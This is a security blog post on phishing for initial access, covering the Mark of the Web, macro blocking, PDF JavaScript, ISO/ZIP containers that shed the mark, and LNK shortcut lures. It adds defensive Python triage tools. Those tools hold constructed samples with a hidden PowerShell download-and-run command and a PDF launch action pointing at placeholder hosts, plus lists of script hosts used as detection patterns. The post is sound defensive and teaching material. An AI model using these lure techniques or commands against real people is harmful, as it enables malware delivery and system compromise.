BITM, May 1 2023

Phishing for Initial Access (Threat Actor Style)

Introduction

Initial Access consists of the techniques an adversary uses to gain a first foothold in a network. Common entry vectors are targeted spearphishing and the exploitation of weaknesses in public-facing web servers. A foothold gained this way may provide continued access (for example a valid account or an external remote service), or it may be short-lived if the credential is changed or the host is rebuilt, in which case the adversary uses it to enumerate valid accounts and internal hosts before it is lost.

Adversaries send phishing messages to gain access to victim systems. When the phishing is targeted it is called spearphishing: a specific individual, company or industry is chosen, and the adversary sends that target e-mails carrying a malicious attachment or link in an attempt to gain access to its systems.

A spearphishing attachment is a specific variant of spearphishing. It differs from the other forms in that the malicious content (a document, script or archive) is attached to the e-mail itself, and it usually relies on the user opening the attachment to gain execution.

What is MOTW?

The Mark of the Web (MOTW) is stored as an NTFS alternate data stream named Zone.Identifier that is attached to files saved from the Internet zone. The stream was introduced with the Attachment Execution Service in Windows XP Service Pack 2 (2004) and has been carried forward in every subsequent Windows version, including Windows 7, 8, 8.1, 10 and 11; browsers, e-mail clients and Explorer write it when a file is downloaded or saved.

MOTW itself does not sandbox anything; it is a tag that other security features consume. Office opens a tagged document in Protected View and, since 2022, blocks its VBA macros outright; Windows Defender SmartScreen checks a tagged executable's reputation before it runs; Explorer shows the "this file came from another computer" prompt; and PowerShell's execution policy treats a tagged script as remote, so under RemoteSigned it must be signed. The tag stays with the file as long as it lives on NTFS. A user can clear it with the Unblock checkbox in the file's Properties or with Unblock-File, and copying the file to a FAT32 or exFAT volume drops it because those file systems have no alternate data streams.

Macros before and after the announcement from Microsoft

In February 2022, Microsoft announced that VBA macros in Office files obtained from the internet (files carrying the Mark of the Web) would be blocked by default for all Office users, following the earlier default-blocking of Excel 4.0 (XL4) macros. Proofpoint [link to article] observed that threat actors' use of macro-enabled attachments fell by approximately 66% after the change.

This change pushed threat actors toward other initial access techniques, above all container files such as ZIP archives and ISO images. Other techniques observed were download links to malicious files placed inside documents such as PDFs and some Microsoft Office file types.

A quick overview of some of the techniques Threat Actor groups use to bypass these security measures follows:

Downloadable links in files

Links in documents that point to malicious files are a well-used avenue for threat actors. The document itself carries no payload, so it passes attachment filtering, and the payload is hosted on attacker-controlled infrastructure or on popular services such as code repositories, centralized download management services, online storage and application stores, whose domains are rarely blocked.

Embedded JS for PDF files

JavaScript (JS) is a scripting language commonly used in web development, but it can also be embedded in PDF documents. In readers that implement the Acrobat JavaScript API, code attached to the document's OpenAction (or to page and form events) runs when the document is opened, which allows for a wide range of functionality, including interactivity and multimedia features. Because the same mechanism can be abused, support varies between readers and it can be disabled by policy (in Adobe Acrobat and Reader under Preferences > JavaScript).

Users who enable JS, or leave it enabled, to take advantage of such features raise their exposure to malicious actors, who use it to deliver malware or steal sensitive data. Attackers also use social engineering to get the user to enable JS or to click through the reader's warning, and the typical lure does not even need JS to run automatically: a page that reads like a blocked document, with a button or link prompting the user to "enable" content, is enough to get the user to open the link or attachment that carries the payload.
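As an added example (not code from the original post), the following Python triage scanner looks for the action and JavaScript keywords discussed above in a PDF, undoes the #xx name escaping attackers use to hide them, and inflates FlateDecode streams so that keywords buried in compressed objects are seen as well. The sample PDFs are constructed for the demo and example.invalid is a placeholder host.

```python
"""Static triage of a PDF for the action/JavaScript keywords phishing lures rely on."""
import re
import zlib

# Keywords and what their presence means.  PDF names are case-sensitive.
KEYWORDS = {
    b"/OpenAction": "action runs when the document is opened",
    b"/AA": "additional actions (page open, mouse and form events)",
    b"/JavaScript": "JavaScript action",
    b"/JS": "inline JavaScript",
    b"/Launch": "launches an external program",
    b"/URI": "opens a URL",
    b"/EmbeddedFile": "embedded file attachment",
    b"/SubmitForm": "posts form data to a URL",
}
# A PDF name ends at whitespace or a delimiter; this lookahead stops /JS matching /JSX.
_NAME_END = rb"(?![^\s/\[\]<>(){}%])"


def _unescape_names(data: bytes) -> bytes:
    """Undo #xx escapes in names: /J#53 is the same name as /JS (a common obfuscation)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def _inflated_streams(data: bytes):
    """Yield the decompressed content of every stream that zlib can inflate."""
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate (or corrupt); the raw bytes were scanned anyway


def _literal_strings_after(view: bytes, key: bytes):
    """PDF literal strings (balanced parentheses, backslash escapes) that follow key."""
    out = []
    for m in re.finditer(re.escape(key) + rb"\s*\(", view):
        i, depth, buf = m.end(), 1, bytearray()
        while i < len(view) and depth:
            c = view[i:i + 1]
            if c == b"\\" and i + 1 < len(view):
                buf += view[i:i + 2]
                i += 2
                continue
            if c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
            if depth:
                buf += c
            i += 1
        out.append(buf.decode("latin-1"))
    return out


def scan_pdf(data: bytes) -> dict:
    """Return keyword hits, extracted /JS strings and a coarse risk rating."""
    if not data.lstrip().startswith(b"%PDF"):
        raise ValueError("not a PDF header")
    # Unescape names only after inflating: '#' bytes inside compressed data are not escapes.
    views = [_unescape_names(data)] + [_unescape_names(s) for s in _inflated_streams(data)]
    hits = {}
    for kw, meaning in KEYWORDS.items():
        n = sum(len(re.findall(re.escape(kw) + _NAME_END, v)) for v in views)
        if n:
            hits[kw.decode()] = n
    scripts = [s for v in views for s in _literal_strings_after(v, b"/JS")]
    auto = {"/OpenAction", "/AA"} & hits.keys()
    active = {"/JavaScript", "/JS", "/Launch", "/SubmitForm"} & hits.keys()
    if "/Launch" in hits or (auto and active):
        risk = "high"       # something runs as soon as the document is opened
    elif active or "/EmbeddedFile" in hits:
        risk = "medium"     # needs a click or a form event
    else:
        risk = "low"
    return {"hits": hits, "scripts": scripts, "risk": risk}


def _flate_obj(num: int, content: bytes) -> bytes:
    body = zlib.compress(content)
    return (f"{num} 0 obj << /Length {len(body)} /Filter /FlateDecode >>\nstream\n".encode()
            + body + b"\nendstream\nendobj\n")


# Constructed sample lure: obfuscated names, JS on open, and a /Launch hidden in a compressed object.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /Java#53cript /J#53 (app.launchURL('https://example.invalid/a.exe', true)) >> endobj\n"
    + _flate_obj(5, b"<< /S /Launch /F (cmd.exe) /P (/c start invoice.lnk) >>")
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

if __name__ == "__main__":
    for name, pdf in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(name, scan_pdf(pdf))
```

The scanner is deliberately a keyword triage, not a parser: it will miss JavaScript stored as a hex string or inside an object stream that uses a filter other than Flate, so a "low" result is a reason to look further with a real PDF parser, not a clean bill of health.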

Using containers to deliver malware

A different class of technique, now common and growing more elaborate, uses container file types to shed the MOTW so that the files inside are opened without the protections described above.

When an executable tagged with the MOTW is run, Windows Defender SmartScreen checks the file's reputation (its hash and, if present, its publisher signature) against Microsoft's cloud service. A file with no established reputation is stopped with a warning that the user must deliberately click through ("Run anyway") before it executes.

When a container file is downloaded from the Internet it receives the MOTW, but the files inside it may not inherit the mark when the container is extracted or mounted. The mark lives in an NTFS alternate data stream; archive and disk-image formats have no equivalent field, so whether the files inside get the mark depends entirely on the tool that unpacks them. Explorer's built-in ZIP handling propagates it, but many third-party archivers do not, and a mounted ISO or IMG image presents its contents as a local volume on which the mark was never present. Files that come out of such a container are treated as local and run without SmartScreen, Protected View or macro blocking. Copying a marked file to a FAT32 or exFAT volume (a USB stick, for instance) removes the mark for the same reason.
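As an added example covering both the MOTW description above and the container-file problem (my code, not the author's): the first part parses the Zone.Identifier stream and classifies the zone; the second part is a ZIP extractor that re-applies the container's mark to every extracted file, which is what Explorer does and many archivers do not, with a zip-slip guard because an archive that escapes its destination directory is the other classic archive trick. The sample ZIP and Zone.Identifier content are constructed; the stream is only written on Windows, where `name:stream` addresses an alternate data stream rather than a separate file.

```python
"""Zone.Identifier (Mark of the Web) parsing and a ZIP extractor that keeps the mark."""
import os
import pathlib
import tempfile
import zipfile

# URL security zones as numbered in Zone.Identifier; 3 and 4 are the untrusted ones.
ZONES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites", 3: "Internet", 4: "RestrictedSites"}

# Constructed example of what a browser writes into the stream on download (not a real capture).
SAMPLE_ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://mail.example.invalid/inbox\r\n"
    "HostUrl=https://cdn.example.invalid/Invoice_2023.zip\r\n"
)


def parse_zone_identifier(text):
    """Parse the INI-style stream into a dict; returns {} if there is no [ZoneTransfer] section."""
    fields, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line == "[ZoneTransfer]"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def is_untrusted(fields):
    """Internet (3) and RestrictedSites (4) are the zones SmartScreen and Office act on."""
    return int(fields.get("ZoneId", "0")) >= 3


def read_zone_identifier(path):
    """Read the stream on NTFS (Windows). Returns None when absent or on other platforms."""
    try:
        with open(f"{path}:Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None


def extract_with_motw(container, dest, zone_text=None):
    """Extract a ZIP, writing the container's Zone.Identifier onto every extracted member.

    zone_text overrides reading the stream from the container (needed off NTFS).
    Returns the member names that were extracted.
    """
    if zone_text is None and os.name == "nt":
        try:
            with open(f"{container}:Zone.Identifier", "r", errors="replace") as f:
                zone_text = f.read()
        except OSError:
            zone_text = None  # container was never marked; nothing to propagate
    written = []
    with zipfile.ZipFile(container) as zf:
        for member in zf.infolist():
            name = member.filename.replace("\\", "/")
            parts = pathlib.PurePosixPath(name).parts
            if member.is_dir() or not parts or ".." in parts or name.startswith("/"):
                continue  # zip-slip guard: refuse absolute and parent-relative names
            out_path = zf.extract(member, dest)
            written.append(member.filename)
            if zone_text and os.name == "nt":
                with open(f"{out_path}:Zone.Identifier", "w") as ads:
                    ads.write(zone_text)
    return written


def build_sample_zip(path):
    """Constructed lure: a shortcut inside a folder plus a zip-slip member that must be refused."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("Invoice_2023/Invoice.pdf.lnk", b"L\x00\x00\x00" + b"\x00" * 72)
        zf.writestr("../evil.txt", b"must not land outside dest")


def demo():
    """Build the sample, extract it with the constructed mark, and report what was written."""
    with tempfile.TemporaryDirectory() as tmp:
        container = os.path.join(tmp, "Invoice_2023.zip")
        build_sample_zip(container)
        out = os.path.join(tmp, "out")
        written = extract_with_motw(container, out, SAMPLE_ZONE_IDENTIFIER)
        marks = {name: read_zone_identifier(os.path.join(out, name)) for name in written}
        assert not os.path.exists(os.path.join(tmp, "evil.txt"))
    return written, marks


if __name__ == "__main__":
    zone = parse_zone_identifier(SAMPLE_ZONE_IDENTIFIER)
    print(ZONES[int(zone["ZoneId"])], "untrusted" if is_untrusted(zone) else "trusted", zone["HostUrl"])
    print(demo())
```

On Windows, `demo()` returns the parsed mark for the extracted shortcut (ZoneId 3), which is what makes Explorer warn when it is double-clicked; on other platforms the marks are None because there is no stream to write. The same check, `read_zone_identifier` on every file in a mounted ISO, is a quick way to confirm that a given Windows build and mounting tool drop the mark.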

IMG and ISO files are disk-image formats commonly used to distribute software and operating systems. Since Windows 8, Explorer mounts them as a virtual drive on double-click, which is what makes them attractive to attackers. The image is attached to a phishing e-mail; the victim double-clicks it and sees what looks like a local drive containing a single file, typically an executable or a LNK with a document icon, and opens that. Because the mounted volume carries no MOTW, the payload runs without the SmartScreen warning it would have triggered as a direct attachment, and the image often also passes mail gateways that block executable attachments but not disk images. From there the attackers have a foothold on the compromised system to continue their activities.

LNK files, or Windows shortcut files, point to a file or folder on a Windows system, but a shortcut also stores a full command line: a target program, its arguments, a working directory and an icon of the attacker's choosing. Attackers exploit this to deliver malware to their victims.

One common technique is to craft spear-phishing e-mails that appear to come from legitimate sources, such as colleagues, customers or business partners, with a malicious LNK file attached (on its own or inside a ZIP or ISO). When the victim opens the LNK file, Windows runs the stored command line, which downloads and installs malware on the victim's system.

The LNK file itself contains no executable code. Its target is a program already present on the system, typically cmd.exe, powershell.exe, mshta.exe or rundll32.exe, and its arguments tell that program to fetch the next stage from a remote location and run it. Because the shortcut is not itself an executable, it slips past controls that block executable attachments, while the icon (usually that of a PDF or Word document) hides what the double-click will do.
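Added example, not from the original post: a minimal parser for the Shell Link binary format (MS-SHLLINK) that pulls out the fields described above (target path, arguments, working directory, icon) and applies the triage rules a responder uses on a suspicious shortcut: does it launch a script host or another living-off-the-land binary, is there a URL or an encoded command in the arguments, is the window hidden, and does the icon disguise the program being launched. The sample shortcut is built by `build_lnk` in the same block and is not real malware; example.invalid is a placeholder host.

```python
"""Minimal MS-SHLLINK (.lnk) parser for triaging shortcut-based phishing lures."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData items appear in this fixed order, each only if its flag is set.
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# Programs a shortcut received by e-mail has no business launching, and command-line tells.
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec", "curl")
ARG_MARKERS = ((" -e ", "encoded PowerShell"), ("-enc", "encoded PowerShell"),
               ("frombase64string", "base64 decode in command line"),
               ("-w hidden", "hidden window"), ("-windowstyle hidden", "hidden window"),
               ("http://", "URL in command line"), ("https://", "URL in command line"))


def _read_string(data, off, unicode):
    """One StringData item: uint16 CountCharacters followed by the characters, no terminator."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(data):
    """Return the StringData fields of a shortcut, skipping IDList and LinkInfo by their sizes."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a ShellLink (bad HeaderSize or CLSID)")
    (flags,) = struct.unpack_from("<I", data, 20)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]       # LinkInfoSize includes itself
    fields = {"flags": flags}
    for flag, name in STRING_DATA:
        if flags & flag:
            fields[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return fields


def triage_lnk(data):
    """Apply the responder's rules to a shortcut and return the parsed fields plus reasons."""
    f = parse_lnk(data)
    target = f.get("relative_path", "").lower()
    cmdline = (target + " " + f.get("arguments", "")).lower()
    reasons = [f"launches {h}" for h in SCRIPT_HOSTS if h in cmdline]
    reasons += sorted({why for marker, why in ARG_MARKERS if marker in cmdline})
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1]
    icon = f.get("icon_location", "").lower()
    if reasons and icon and exe and exe not in icon:
        reasons.append("icon does not match the launched program (decoy icon)")
    return {"fields": f, "reasons": reasons, "suspicious": bool(reasons)}


def build_lnk(relative_path, arguments="", working_dir=".", icon_location=""):
    """Constructed sample (not real malware): a Unicode shortcut carrying StringData only."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    if icon_location:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (76 - len(header))  # attributes, timestamps, size, icon index, showcmd, hotkey, reserved
    strings = [relative_path, working_dir, arguments] + ([icon_location] if icon_location else [])
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)


# The shape of a typical lure: a relative path to PowerShell, a hidden window, a download-and-run
# one-liner, and a system icon so the shortcut does not look like what it is.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -ep bypass -c "iwr https://example.invalid/p.ps1 -o $env:TEMP\\p.ps1; . $env:TEMP\\p.ps1"',
    icon_location=r"%SystemRoot%\System32\shell32.dll",
)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo as well; the parser skips both by their declared sizes, so it reaches the command line regardless, and the relative path is what a lure typically relies on because it resolves from wherever the victim extracted the file.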

Once the malware is installed on the victim's system, it can carry out a variety of malicious activities, such as stealing sensitive data, downloading additional malware, or creating backdoors that allow the attacker to access the system remotely.

Conclusion

In conclusion, initial access techniques remain a serious threat to businesses, with threat actors constantly shifting their tactics to evade detection and gain access to their targets' systems. While the MOTW feature in Windows provides some protection against malicious files, it is not foolproof, and attackers bypass it with container files such as ISO and IMG images. Similarly, LNK files remain a popular choice for delivering malware, and threat actors use tooling to create custom shortcuts that take various forms and are tailored to specific targets and scenarios.

To defend against these attacks, organizations need a multi-layered approach that combines several security measures: email and web filtering (including blocking or detonating container and shortcut attachments such as ISO, IMG, VHD and LNK), endpoint protection, user education and software patching. By doing so, they reduce the risk of compromise and protect against attacks that use the whole range of malicious files, whether they exploit vulnerabilities or rely on social engineering.

It is crucial for organizations to stay up-to-date on the latest threats and continuously adapt their security measures to stay ahead of attackers. By being vigilant and proactive, businesses can protect their systems and data from the potentially devastating effects of cyber attacks.

Thanks for reading and stay safe out there!


Author: G. Botha
